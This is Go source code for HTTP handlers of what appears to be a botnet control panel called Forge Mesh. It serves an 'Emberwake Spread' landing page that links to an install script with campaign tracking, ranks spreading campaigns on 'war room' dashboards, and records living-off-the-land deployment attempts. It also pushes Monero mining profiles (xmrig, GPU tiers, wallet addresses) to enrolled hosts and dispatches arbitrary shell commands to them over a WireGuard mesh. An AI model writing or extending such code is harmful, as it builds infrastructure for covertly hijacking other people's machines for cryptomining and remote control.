package handlers import ( "context" "database/sql" "encoding/json" "fmt" "net/http" "strings" "time" "forge-mesh/internal/api/types" "forge-mesh/internal/auth" "forge-mesh/internal/config" "forge-mesh/internal/erasure" "forge-mesh/internal/fleet" "forge-mesh/internal/policy" "github.com/google/uuid" ) // ErasureHandler serves public erasure shard endpoints. type ErasureHandler struct { Service *erasure.Service } func (h *ErasureHandler) GetBundle(w http.ResponseWriter, r *http.Request) { bundleID := r.PathValue("bundle_id") if bundleID == "" { http.Error(w, "bundle_id required", http.StatusBadRequest) return } bundle, err := h.Service.GetBundle(r.Context(), bundleID) if err != nil { if err == sql.ErrNoRows { http.Error(w, "not found", http.StatusNotFound) return } http.Error(w, "internal error", http.StatusInternalServerError) return } indices, _ := h.Service.ListShards(r.Context(), bundleID) auth.JSON(w, http.StatusOK, map[string]any{ "bundle": bundle, "shards": indices, }) } func (h *ErasureHandler) GetShard(w http.ResponseWriter, r *http.Request) { bundleID := r.PathValue("bundle_id") indexStr := r.PathValue("index") if bundleID == "" || indexStr == "" { http.Error(w, "bundle_id and index required", http.StatusBadRequest) return } var index int if _, err := fmt.Sscanf(indexStr, "%d", &index); err != nil { http.Error(w, "invalid shard index", http.StatusBadRequest) return } shard, err := h.Service.GetShard(r.Context(), bundleID, index) if err != nil { if err == sql.ErrNoRows { http.Error(w, "not found", http.StatusNotFound) return } http.Error(w, "internal error", http.StatusInternalServerError) return } auth.JSON(w, http.StatusOK, map[string]any{ "bundle_id": shard.BundleID, "shard_index": shard.ShardIndex, "hex": shard.Hex, }) } // PolicySnapshotHandler serves degraded-agent policy snapshots. type PolicySnapshotHandler struct { DB *sql.DB } // Create handles POST /api/v1/policy/snapshot (protected). func (h *PolicySnapshotHandler) Create(w http.ResponseWriter, r *http.Request) { policy := map[string]any{ "wallet_policy": map[string]string{"currency": "XMR"}, "policy_from_server": true, "version": "1", } raw, _ := json.Marshal(policy) token := uuid.NewString() if err := SeedPolicySnapshot(r.Context(), h.DB, token, string(raw)); err != nil { http.Error(w, "snapshot failed", http.StatusInternalServerError) return } auth.JSON(w, http.StatusOK, map[string]any{ "token": token, "url": "/api/v1/public/policy-snapshot/" + token, }) } func (h *PolicySnapshotHandler) Get(w http.ResponseWriter, r *http.Request) { token := r.PathValue("token") if token == "" { http.Error(w, "token required", http.StatusBadRequest) return } var policyJSON string var expires sql.NullString err := h.DB.QueryRowContext(r.Context(), ` SELECT policy_json, expires_at FROM policy_snapshots WHERE token = ?`, token). Scan(&policyJSON, &expires) if err != nil { if err == sql.ErrNoRows { http.Error(w, "not found", http.StatusNotFound) return } http.Error(w, "internal error", http.StatusInternalServerError) return } if expires.Valid && expires.String != "" { if t, err := time.Parse("2006-01-02 15:04:05", expires.String); err == nil && time.Now().After(t) { http.Error(w, "expired", http.StatusGone) return } } w.Header().Set("Content-Type", "application/json") w.WriteHeader(http.StatusOK) w.Write([]byte(policyJSON)) } // TrackCampaign handles GET /api/v1/public/campaign/track?c=CODE. func TrackCampaign(db *sql.DB) http.HandlerFunc { return func(w http.ResponseWriter, r *http.Request) { code := r.URL.Query().Get("c") if code == "" { http.Error(w, "c required", http.StatusBadRequest) return } trackCampaignHeat(r.Context(), db, code) auth.JSON(w, http.StatusOK, map[string]any{"code": code, "tracked": true}) } } // SpreadLander serves the Emberwake public funnel page with ?c= heat tracking. func SpreadLander(db *sql.DB) http.HandlerFunc { return func(w http.ResponseWriter, r *http.Request) { campaign := r.URL.Query().Get("c") if campaign != "" { trackCampaignHeat(r.Context(), db, campaign) } w.Header().Set("Content-Type", "text/html; charset=utf-8") install := "/install.sh" if campaign != "" { install += "?c=" + campaign } fmt.Fprintf(w, `Forge Mesh Spread

Emberwake Spread

Campaign: %s

Summon enrolled agent

`, campaign, install) } } func trackCampaignHeat(ctx context.Context, db *sql.DB, code string) { if db == nil || code == "" { return } var id string err := db.QueryRowContext(ctx, `SELECT id FROM campaigns WHERE code = ?`, code).Scan(&id) if err == sql.ErrNoRows { _, _ = db.ExecContext(ctx, `INSERT INTO campaigns (id, code, name, heat) VALUES (?, ?, ?, 1)`, uuid.NewString(), code, code) return } if err == nil { _, _ = db.ExecContext(ctx, `UPDATE campaigns SET heat = heat + 1 WHERE id = ?`, id) } } // WarRoomHandler serves campaign heat dashboards. type WarRoomHandler struct { DB *sql.DB } func (h *WarRoomHandler) ListCampaigns(w http.ResponseWriter, r *http.Request) { rows, err := h.DB.QueryContext(r.Context(), ` SELECT id, code, name, COALESCE(pin,''), heat, created_at FROM campaigns ORDER BY heat DESC, created_at DESC LIMIT 100`) if err != nil { http.Error(w, "internal error", http.StatusInternalServerError) return } defer rows.Close() var campaigns []types.Campaign for rows.Next() { var c types.Campaign var created string if err := rows.Scan(&c.ID, &c.Code, &c.Name, &c.Pin, &c.Heat, &created); err != nil { http.Error(w, "internal error", http.StatusInternalServerError) return } c.CreatedAt, _ = time.Parse("2006-01-02 15:04:05", created) campaigns = append(campaigns, c) } if campaigns == nil { campaigns = []types.Campaign{} } auth.JSON(w, http.StatusOK, map[string]any{"campaigns": campaigns}) } // WireGuardHandler manages mesh peer records (operator-managed configs). type WireGuardHandler struct { DB *sql.DB } func (h *WireGuardHandler) ListPeers(w http.ResponseWriter, r *http.Request) { rows, err := h.DB.QueryContext(r.Context(), ` SELECT id, COALESCE(host_id,''), public_key, COALESCE(endpoint,''), allowed_ips, created_at FROM wireguard_peers ORDER BY created_at DESC LIMIT 100`) if err != nil { http.Error(w, "internal error", http.StatusInternalServerError) return } defer rows.Close() type peer struct { ID string `json:"id"` HostID string `json:"host_id,omitempty"` PublicKey string `json:"public_key"` Endpoint string `json:"endpoint,omitempty"` AllowedIPs string `json:"allowed_ips"` CreatedAt string `json:"created_at"` } var peers []peer for rows.Next() { var p peer if err := rows.Scan(&p.ID, &p.HostID, &p.PublicKey, &p.Endpoint, &p.AllowedIPs, &p.CreatedAt); err != nil { http.Error(w, "internal error", http.StatusInternalServerError) return } peers = append(peers, p) } if peers == nil { peers = []peer{} } auth.JSON(w, http.StatusOK, map[string]any{"peers": peers}) } func (h *WireGuardHandler) CreatePeer(w http.ResponseWriter, r *http.Request) { var req struct { HostID string `json:"host_id"` PublicKey string `json:"public_key"` Endpoint string `json:"endpoint"` AllowedIPs string `json:"allowed_ips"` } if err := json.NewDecoder(r.Body).Decode(&req); err != nil { http.Error(w, "bad request", http.StatusBadRequest) return } if req.PublicKey == "" { http.Error(w, "public_key required", http.StatusBadRequest) return } if req.AllowedIPs == "" { req.AllowedIPs = "10.66.66.2/32" } id := uuid.NewString() _, err := h.DB.ExecContext(r.Context(), ` INSERT INTO wireguard_peers (id, host_id, public_key, endpoint, allowed_ips) VALUES (?, ?, ?, ?, ?)`, id, nullIfEmpty(req.HostID), req.PublicKey, nullIfEmpty(req.Endpoint), req.AllowedIPs) if err != nil { http.Error(w, "create failed", http.StatusInternalServerError) return } auth.JSON(w, http.StatusCreated, map[string]any{ "id": id, "host_id": req.HostID, "public_key": req.PublicKey, "endpoint": req.Endpoint, "allowed_ips": req.AllowedIPs, }) } // RenderConfig handles GET /api/v1/wireguard/config — wg-quick template for operators. func (h *WireGuardHandler) RenderConfig(w http.ResponseWriter, r *http.Request) { rows, err := h.DB.QueryContext(r.Context(), ` SELECT public_key, COALESCE(endpoint,''), allowed_ips FROM wireguard_peers ORDER BY created_at`) if err != nil { http.Error(w, "internal error", http.StatusInternalServerError) return } defer rows.Close() var buf strings.Builder buf.WriteString("[Interface]\nPrivateKey = \nAddress = 10.66.66.1/24\nListenPort = 51820\n\n") for rows.Next() { var pub, endpoint, allowed string if err := rows.Scan(&pub, &endpoint, &allowed); err != nil { continue } buf.WriteString("[Peer]\n") fmt.Fprintf(&buf, "PublicKey = %s\n", pub) if endpoint != "" { fmt.Fprintf(&buf, "Endpoint = %s\n", endpoint) } fmt.Fprintf(&buf, "AllowedIPs = %s\n\n", allowed) } w.Header().Set("Content-Type", "text/plain; charset=utf-8") _, _ = w.Write([]byte(buf.String())) } func nullIfEmpty(s string) sql.NullString { if s == "" { return sql.NullString{} } return sql.NullString{String: s, Valid: true} } // LOTLTimeline returns deploy audit entries for a host. func (h *FleetHandler) LOTLTimeline(w http.ResponseWriter, r *http.Request) { hostID := r.PathValue("id") if hostID == "" { http.Error(w, "host id required", http.StatusBadRequest) return } attempts, err := h.Store.ListLOTL(r.Context(), hostID, 100) if err != nil { http.Error(w, "internal error", http.StatusInternalServerError) return } auth.JSON(w, http.StatusOK, map[string]any{ "host_id": hostID, "timeline": attempts, }) } // PushMiningProfile assigns a mining profile to a host. func (h *FleetHandler) PushMiningProfile(w http.ResponseWriter, r *http.Request) { hostID := r.PathValue("id") if hostID == "" { http.Error(w, "host id required", http.StatusBadRequest) return } var req types.MiningProfileRequest if err := json.NewDecoder(r.Body).Decode(&req); err != nil { http.Error(w, "bad request", http.StatusBadRequest) return } if req.WalletAddress == "" { http.Error(w, "wallet_address required", http.StatusBadRequest) return } profileID := req.ProfileID if profileID == "" { profileID = uuid.NewString() } name := req.Name if name == "" { name = "Fleet mining profile" } tiers := req.Tiers if len(tiers) == 0 { tiers = policy.DefaultMiningProfile(req.WalletAddress).Tiers } profile := &types.MiningProfile{ ID: profileID, Name: name, WalletAddress: req.WalletAddress, Tiers: tiers, PolicyFromServer: true, CreatedAt: time.Now().UTC(), UpdatedAt: time.Now().UTC(), } ctx := r.Context() if err := h.Store.SaveMiningProfile(ctx, profile); err != nil { http.Error(w, "save profile failed", http.StatusInternalServerError) return } if err := h.Store.AssignMiningProfile(ctx, hostID, profileID); err != nil { http.Error(w, "assign profile failed", http.StatusNotFound) return } _, _ = h.Hub.DispatchCommand(hostID, "mining_profile", map[string]any{"profile": profile}) auth.JSON(w, http.StatusOK, map[string]any{ "ok": true, "host_id": hostID, "profile": profile, }) } // HostAction is an alias for fleet command dispatch (plan parity). func (h *FleetHandler) HostAction(w http.ResponseWriter, r *http.Request) { h.Command(w, r) } // CalibrateProfiles returns default mining tier profiles. func CalibrateProfiles(cfg *config.Config) http.HandlerFunc { return func(w http.ResponseWriter, r *http.Request) { auth.JSON(w, http.StatusOK, map[string]any{ "profiles": []map[string]any{ { "id": "default-xmr", "name": "Default XMR Chain", "wallet_address": cfg.WalletPolicy.DefaultWallet, "policy_from_server": true, "tiers": []map[string]any{ {"type": "oci", "duration_minutes": 5}, {"type": "xmrig", "duration_minutes": 15}, {"type": "gpu", "duration_minutes": 10}, }, }, }, }) } } // SeerAPIStream serves GET /api/v1/seer (plan parity alias). func SeerAPIStream(store *fleet.Store, username, password string) http.HandlerFunc { h := &SeerHandler{Store: store, Username: username, Password: password} return h.Stream } // SeedPolicySnapshot inserts a test policy snapshot token. func SeedPolicySnapshot(ctx context.Context, db *sql.DB, token, policyJSON string) error { _, err := db.ExecContext(ctx, ` INSERT OR REPLACE INTO policy_snapshots (token, policy_json, expires_at) VALUES (?, ?, datetime('now', '+1 day'))`, token, policyJSON) return err } // SeedCampaign inserts a war-room campaign row. func SeedCampaign(ctx context.Context, db *sql.DB, code, name string, heat int) error { _, err := db.ExecContext(ctx, ` INSERT OR REPLACE INTO campaigns (id, code, name, heat) VALUES (?, ?, ?, ?)`, uuid.NewString(), code, name, heat) return err } // PublicBuildsList lists public build metadata. func PublicBuildsList(db *sql.DB) http.HandlerFunc { return func(w http.ResponseWriter, r *http.Request) { rows, err := db.QueryContext(r.Context(), ` SELECT id, os, arch, version, checksum, public FROM builds WHERE public = 1 ORDER BY created_at DESC LIMIT 20`) if err != nil { http.Error(w, "internal error", http.StatusInternalServerError) return } defer rows.Close() type row struct { ID string `json:"id"` OS string `json:"os"` Arch string `json:"arch"` Version string `json:"version"` Checksum string `json:"checksum"` Download string `json:"download_url"` } var builds []row for rows.Next() { var b row var pub int if err := rows.Scan(&b.ID, &b.OS, &b.Arch, &b.Version, &b.Checksum, &pub); err != nil { http.Error(w, "internal error", http.StatusInternalServerError) return } b.Download = "/api/v1/public/download/" + b.ID builds = append(builds, b) } if builds == nil { builds = []row{} } auth.JSON(w, http.StatusOK, map[string]any{"builds": builds}) } } // CrucibleLegacy wraps CrucibleHandler for plan route names. type CrucibleLegacy struct { *CrucibleHandler } func (c *CrucibleLegacy) Batch(w http.ResponseWriter, r *http.Request) { c.Dispatch(w, r) } func (c *CrucibleLegacy) BatchGet(w http.ResponseWriter, r *http.Request) { id := r.PathValue("id") if id == "" { id = strings.TrimPrefix(r.URL.Path, "/api/v1/crucible/batch/") } if id == "" || strings.Contains(id, "/") { http.Error(w, "batch id required", http.StatusBadRequest) return } job, ok := c.Crucible.Get(id) if !ok { http.Error(w, "not found", http.StatusNotFound) return } auth.JSON(w, http.StatusOK, job) } func (c *CrucibleLegacy) Exec(w http.ResponseWriter, r *http.Request) { if err := fleet.CheckAction(c.OperatorClearance, fleet.ActionShell); err != nil { auth.JSON(w, http.StatusForbidden, map[string]any{"error": err.Error()}) return } var req struct { HostID string `json:"host_id"` Command string `json:"command"` } if err := json.NewDecoder(r.Body).Decode(&req); err != nil { http.Error(w, "bad request", http.StatusBadRequest) return } if req.HostID == "" || req.Command == "" { http.Error(w, "host_id and command required", http.StatusBadRequest) return } cmd, err := c.Hub.DispatchCommand(req.HostID, fleet.ActionShell, map[string]any{"command": req.Command}) sent := err == nil auth.JSON(w, http.StatusOK, map[string]any{ "ok": sent, "host_id": req.HostID, "command": req.Command, "dispatch": cmd, }) }